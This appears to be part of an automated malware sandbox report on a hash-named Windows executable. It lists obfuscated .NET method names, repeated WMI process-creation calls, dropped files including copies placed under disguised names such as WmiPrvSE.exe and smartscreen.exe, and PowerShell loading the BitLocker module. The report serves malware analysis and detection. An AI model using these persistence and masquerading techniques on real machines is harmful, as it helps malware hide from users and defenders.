                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, i9aBvAta7NQBu7uYGHI.csHigh entropy of concatenated method names: 'iHASRdExvc', 'LvTSUdAfqN', 'HhTSBVWs5p', 'kJc4xnUHNdkoSwUr1J7e', 'dn68ywUH6y4NIPKopeN1', 'KPLcN7UHslW7STTa8B33', 'CVvmTfUHFJguqsZa90s1', 'lfut69iUQ5', 'MqxtsSK5ma', 'uAjtNcvjOl'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BvKdSKz6i3GiqDst4c.csHigh entropy of concatenated method names: 'FfnUUY5j6G', 'TToU8abIp7', 'RKjUYKyvSh', 'lahUvcYkkg', 'tGSUtJ8LJo', 'IPNUS29aXd', 'bvcUxCe6io', 'zpA38sUMMGgsvp2Lxpsb', 'CeNY2YUMVwJfKDltB821', 'EJ4WU1UMCHZTwEgl4Sic'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, PZVO9XQyvEW6EWkCOTf.csHigh entropy of concatenated method names: 'bIKBvN28j2l', 'xo4BvFLo7O9', 'TZfq6pUQJauc3XhIRtPV', 'CGIVMxUQOsXbeiZ4BkJm', 'kdybQZUQQWwFoHKuuiwm', 'TCDAqjUQXlWm99iQWlNR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, TkDPMiDomfmP4gpyrHD.csHigh entropy of concatenated method names: 'N9xDpOgE4f', 'jTvDLXHqgQ', 'r3DDnjiTtd', 'mQ2DktrUTJ', 'UcADEOjXU5', 'dcLDaZPdtn', 'CEKDhTjfWU', 'WIUD6DSdXb', '_0023Nn', 'Dispose'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, mYFGYuDPPnsRtlgYXSW.csHigh entropy of concatenated method names: 'Xyb', 'Sz4', 'zej', 'lhNDMj4EEP', 'FIH638UKComVDuN6cq99', 'iRpYpUUK4tO0ZJmNAjle', 'MMIn0SUKodQOemVVnveb', 'FQv5CZUKubr4oaAoIMVL', 'yHBvuwUKH91cZc5nhyH7', 'i87c95UKppdsiYwMErOE'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, tADCkJrqTU2Q0HlBmnu.csHigh entropy of concatenated method names: 'Cj1', '_1Td', 'Cz6', 'ht3', 'VsZrGwIFo4', '_947', 'hWMr7v7Bsw', 'hbYrZQuTjQ', '_1f8', '_71D'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, EPRO5exbMxYgPbrcZqi.csHigh entropy of concatenated method names: '_816', 'd65', 'DEKUYSBdXe1', 'VT1UYIBdlw4', 'xojUI1gJC4N', 'zp2UYRcxbBk', 'W4TtXgUjFcrpehRVRTkw', 'f2eW0UUjDLUGCQcIN8yP', 'NTYadEUjsUh6Fw72rtxk', 'YcS3SjUjNPZrEmy3G5sk'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, AvuW0DDJgLKXlqANM9u.csHigh entropy of concatenated method names: '_7as', 'dxy', '_8Kv', 'qhNDQnDMRG', 'CEvDXUaWan', 'FjcDz8RTEW', '_0023Nn', 'Dispose', 'D4mXg3UKeZISJbAYpF1A', 'EJcGulUKllHl4hxXwcYH'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, JnrFR3NDGj5Umdksxhf.csHigh entropy of concatenated method names: 'DFgNebXbnF', 'VRoNlgeGxv', 'PyoNKvokZj', 'ssCNJbdI0v', 'DxmNOG4ELF', 'tdlNQApnR8', 'n0MNXa4gI6', 'm13Nz7yM6T', 'P7OFRfjJCi', 'j20FU8i99W'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, WucFfiouWiCvvghLiuF.csHigh entropy of concatenated method names: 'K2KopQ8aif', 'i11ojTBSfe', 'DxGoTKwqPi', 'Y34', '_716', 'p32', 'Na8', 'X25', 'pT1', 'DD2o39SgaR'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BYTOxCSlRf8d8PbhFkH.csHigh entropy of concatenated method names: '_5Z7', '_58k', '_4x4', 'bU6', '_3t4', 'a5C', 'kYCwnWUpj3o2XpH0hFHS', 'jQNGwtUpTk7kTx7BNuX5', 'iUg5W6Up34bG03GHSIcH', 'VdEKFPUpLkNExZh0UWD5'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LkJErlBmfuQbEQI7Dva.csHigh entropy of concatenated method names: 'uDbByuyiil', 'cBrBbuwvw1', 'hncRK2UVJeemPSTsHj66', 'nNUt10UVlq6kQZtPl6BY', 'mj2NLAUVKRnhWPwhWDvL', 'WRjjICUVOHBdHivZc286', 'tq9XJNUVQ0KU0ofDFasn', 'wxICpHUVXehDSZWWLZBv', 'CKr2DnUVzuevHCNGCsgj', 'blcSOAUCRER8chNlUjvs'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ka9Gk8eYX7oddSeBxPu.csHigh entropy of concatenated method names: 'pRaetFQs7h', 'gL0eSmKwYa', 'mggeIdMYyp', 'vpoexQIE3M', 'NO2ewPAw5Q', 'JJaegdyyC1', 'akkeWN8p1n', 'QHZeAFdqiO', 'CjceiKYmxO', 'GEZerQCUci'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, ynNMdxtSlP068ZfCbEy.csHigh entropy of concatenated method names: 'kFSt2GLOgy', 'dMPtGS9IkZ', 'Pmj657UHSY8wRHjoK73j', 'euvWK1UHvgfmdXeevhQW', 'GegCGoUHtx5CfjyqaidI', 'XhTv4uUHI8hf5IChQ0rZ', 'MLetysg2oX', 'pPytbA8dOw', 'ISWXtEUH8PiQeoMQxwx1', 'cJkNfyUHUueU1gwFK0YZ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, f0273NpsOBkB35M3Fcd.csHigh entropy of concatenated method names: '_25r', 'h65', 'ysYpFWHj0y', 'IcQpDfrpOk', 'f23pd9Sp7H', 'AWD', 'd78', 'A6v', 'dqG', 'M96'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, wkXiTKeERMVdYVr8C01.csHigh entropy of concatenated method names: 'C0sehqyPsj', 'l8Se6TgcRU', 'rVIesETM53', 'rXQeNBOeq8', 'LgxeFkbtKr', 'Ru7eDU38Vw', 'GlfedUwMUu', 'JbGeeucbP9', 'Tcr7ROUOZ5CJMIT0YcvF', 'ymULXoUOGxSv0UxV2TwJ'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, jKDEdMg4pSELQIYm4Ef.csHigh entropy of concatenated method names: 'XwvAqFLkE7', 'JNBHBtULhvgCXjrsJR8R', 'Qg4mmkULEXY9YpJKb8HN', 'hDJDBpULavHG0nbt8t8E', 'Vdjgu5lhIM', 'neWgHibRSS', 'hGEgporqv4', 'edMgjuMrqJ', 'COagT7IvD0', 'KIdg3tILjP'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, lX8j2AB4QZ617OouKwU.csHigh entropy of concatenated method names: 'j0UBfE0C1R', 'QKtSa9UCbmjkSA7yX7T0', 'yW5YlSUC0pQqdpxwUul2', 'zBsSfOUCyYac24gJKwch', 'F9JQhtUCqpUtdJrRyWRL', 'RjhqXAUC23eC0DaOJjSM', 'cU5MMJUCGQ3MOuV0qUD6', 'LkDBujAoWH', 'hlFBHRTfpS', 'EcPBpGsGho'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, pxw1SGV2fdojUI1JXeH.csHigh entropy of concatenated method names: 'plDV7AoG9M', 'dBTVZN4Iwy', 'kTMV5agsuo', 'v29V1nFIcj', 'sX7VPuShV3', 'rMjV9XHooa', 'DIeYbJU62sB30Ft0vZLT', 'qaC7y7U6b1HmXjUpLlnF', 'fBAsrjU6q7fbnI0NsnRP', 'AeFU0LU6GWskBfNhIXKD'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, b5NKhLy17ibJYUQjat.csHigh entropy of concatenated method names: 'JPxpfSB2e', 'TkTEnhU9KttmZTWeHocH', 'kOmx1gU9e1ifoCoUUXYP', 'YKbo67U9lYLY4iavrwQ5', 'yWbXjuU9JhsVYwWRxkQv', 'MOLqujRan', 'pIW2dAA5y', 'BvAG6cRQi', 'MHk73LE85', 'l6FZR3opI'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, BoKyWKdAmvbd2b2RMwn.csHigh entropy of concatenated method names: 'VSmUt3LohcH', 'nOuUtLpR3ss', 'e97UtcbLJbj', 'PhkVVKUJpBFdRgeBKiLR', 'yE2jBoUJu2b1s2ESHytF', 'iJtFGxUJHHefsc49ckjJ', 'ofKUI6ZGnvu', 'nOuUtLpR3ss', 'WjKkMoUJLgJ3KQybqftD', 'kiKKIIUJTPHeG92HABwl'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, IJJw9EvAOuvS43y66rB.csHigh entropy of concatenated method names: 'Wc7', 'k7S', '_37r', 'M3FUIGVFiiA', 'Er0U8zHOTet', 'vd2uPNUuINX1cSlsBnHk', 'Q21nhRUuxLutwTnRneJM', 'FmJycEUuwsbCYeipGYc0', 'YKZQjKUuguHqOwSiGHRd', 'EyVftiUuWMpViZoGWLfj'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, LdTxK5idbydrif7a5IA.csHigh entropy of concatenated method names: 'BuGil27VDy', 'ItIiKNiJds', 'qLJiJM2XIc', 'vyWiOkrEYB', 'WBYiQadbv3', 'X29hl8UccMncTWYQXncE', 'DuEge7Uc3r1bCfDV4W2i', 'AtvQsEUcLVgPITATCnoY', 'TNftiZUcfo976f7UL0me', 'ToEosSUcnJvUlB1JRC9S'
                            Source: d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exe, L526CTiuqPoUqFeb8LJ.csHigh entropy of concatenated method names: 'j9l', 'muJipB5bsr', 'rNMijgruKN', 'dnBiTkekVY', 'm42i3AZrm4', 'Ft3iLnCOpc', 'wP9icK7ADP', 'TLhEwlUc95oJqRIM4Id3', 'YiVkGaUc1HNdrd5uwZ4i', 'RBwYPtUcPKcg2jNYe6Cl'

                            Persistence and Installation Behavior

                            barindex
                            Creates processes via WMI
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\fTGLCVSM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\stDzyxQe.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\yuQrGMvY.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\uDZAyPvf.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\gUHludjC.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\PwjnMVKl.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\fcdLmHlJ.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Program Files (x86)\Mozilla Maintenance Service\logs\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\ylgZbdUT.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\ttRrlCpd.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\EhviVOkL.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Recovery\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\aceLSxeO.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\KIRpkYvx.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\FNQYcsFE.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\WyUWCOVc.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\QyIevzpi.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\hILtgrfA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\VoMNpBPa.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\DhiqiJKM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\wjuqGuQY.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Recovery\WmiPrvSE.exeJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Downloads\smartscreen.exeJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\VWRNVcdg.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\bmmUfKkQ.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\RGFoMnqm.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\nGlBWAAq.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\IUzpLFaA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\ArFrORkS.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\sBnSdgqk.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\qDaBeGpk.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\bmmUfKkQ.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\QyIevzpi.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\IUzpLFaA.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\ylgZbdUT.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\fTGLCVSM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\sBnSdgqk.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\yuQrGMvY.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\wjuqGuQY.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\nGlBWAAq.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\fcdLmHlJ.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\WyUWCOVc.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\DhiqiJKM.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\uDZAyPvf.logJump to dropped file
                            Source: C:\Users\user\Desktop\d3ca1c9cdcf0f664f4c4b469ce935febb6d974693647c.exeFile created: C:\Users\user\Desktop\stDzyxQe.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\EhviVOkL.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\ttRrlCpd.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\aceLSxeO.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\ArFrORkS.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\qDaBeGpk.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\gUHludjC.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\VWRNVcdg.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\KIRpkYvx.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\rreJQTki.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\hILtgrfA.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\RGFoMnqm.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\PwjnMVKl.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\FNQYcsFE.logJump to dropped file
                            Source: C:\Users\Public\Videos\JFQmuJhhcOwSgqtZoqXNEERKgQYwL.exeFile created: C:\Users\user\Desktop\VoMNpBPa.logJump to dropped file

                            Hooking and other Techniques for Hiding and Protection

                            barindex
                            Loading BitLocker PowerShell Module
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
